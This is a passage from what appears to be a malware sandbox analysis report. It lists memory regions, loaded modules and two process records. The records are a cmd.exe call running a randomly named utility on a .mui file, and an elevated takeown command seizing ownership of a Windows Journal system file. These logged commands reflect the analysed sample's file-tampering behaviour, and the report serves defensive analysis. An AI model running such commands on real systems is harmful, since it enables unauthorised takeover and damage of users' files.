| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f820000 | 0x7f820000 | 0x7f91ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f920000 | 0x7f920000 | 0x7f942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f947000 | 0x7f947000 | 0x7f947fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f949000 | 0x7f949000 | 0x7f94bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94c000 | 0x7f94c000 | 0x7f94efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94f000 | 0x7f94f000 | 0x7f94ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #161: cmd.exe
4
0
| Information | Value |
|---|---|
| ID | #161 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:01, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc8 |
| Parent PID | 0xdfc (c:\windows\syswow64\reg.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ED4
0x
E48
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000830000 | 0x00830000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x0083ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x00843fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x00851fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00873fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x009c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x009d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x009f0000 | 0x00aadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9b0000 | 0x7f9b0000 | 0x7faaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fab0000 | 0x7fab0000 | 0x7fad2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fad5000 | 0x7fad5000 | 0x7fad7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fad8000 | 0x7fad8000 | 0x7fadafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fadb000 | 0x7fadb000 | 0x7fadbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fadd000 | 0x7fadd000 | 0x7faddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 |
Process #162: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #162 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:01, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed0 |
| Parent PID | 0xcf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
190
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x04e7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e80000 | 0x04e80000 | 0x04e8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04ea1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004eb0000 | 0x04eb0000 | 0x04ec3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f50000 | 0x04f50000 | 0x04f53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f60000 | 0x04f60000 | 0x04f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x0515ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f80000 | 0x0503dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x0515ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005160000 | 0x05160000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005170000 | 0x05170000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051f0000 | 0x051f0000 | 0x053affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000051f0000 | 0x051f0000 | 0x05377fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000053a0000 | 0x053a0000 | 0x053affff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x053b0000 | 0x053d9fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e910000 | 0x7e910000 | 0x7ea0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea10000 | 0x7ea10000 | 0x7ea32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea38000 | 0x7ea38000 | 0x7ea3afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea3b000 | 0x7ea3b000 | 0x7ea3dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea3e000 | 0x7ea3e000 | 0x7ea3efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea3f000 | 0x7ea3f000 | 0x7ea3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
